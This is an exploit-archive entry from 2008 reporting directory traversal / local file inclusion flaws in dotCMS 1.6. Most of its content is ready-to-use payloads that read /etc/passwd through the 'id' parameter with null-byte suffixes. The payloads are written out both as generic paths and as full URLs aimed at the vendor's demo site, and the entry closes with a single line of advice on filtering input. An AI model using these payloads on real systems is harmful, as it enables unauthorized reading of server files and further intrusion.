[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities
# Published : 2008-08-15
# Author : Don
# Previous Title : PHPBasket (product.php pro_id) SQL Injection Vulnerability
# Next Title : ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++
exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
# www.Syue.com [2008-08-15]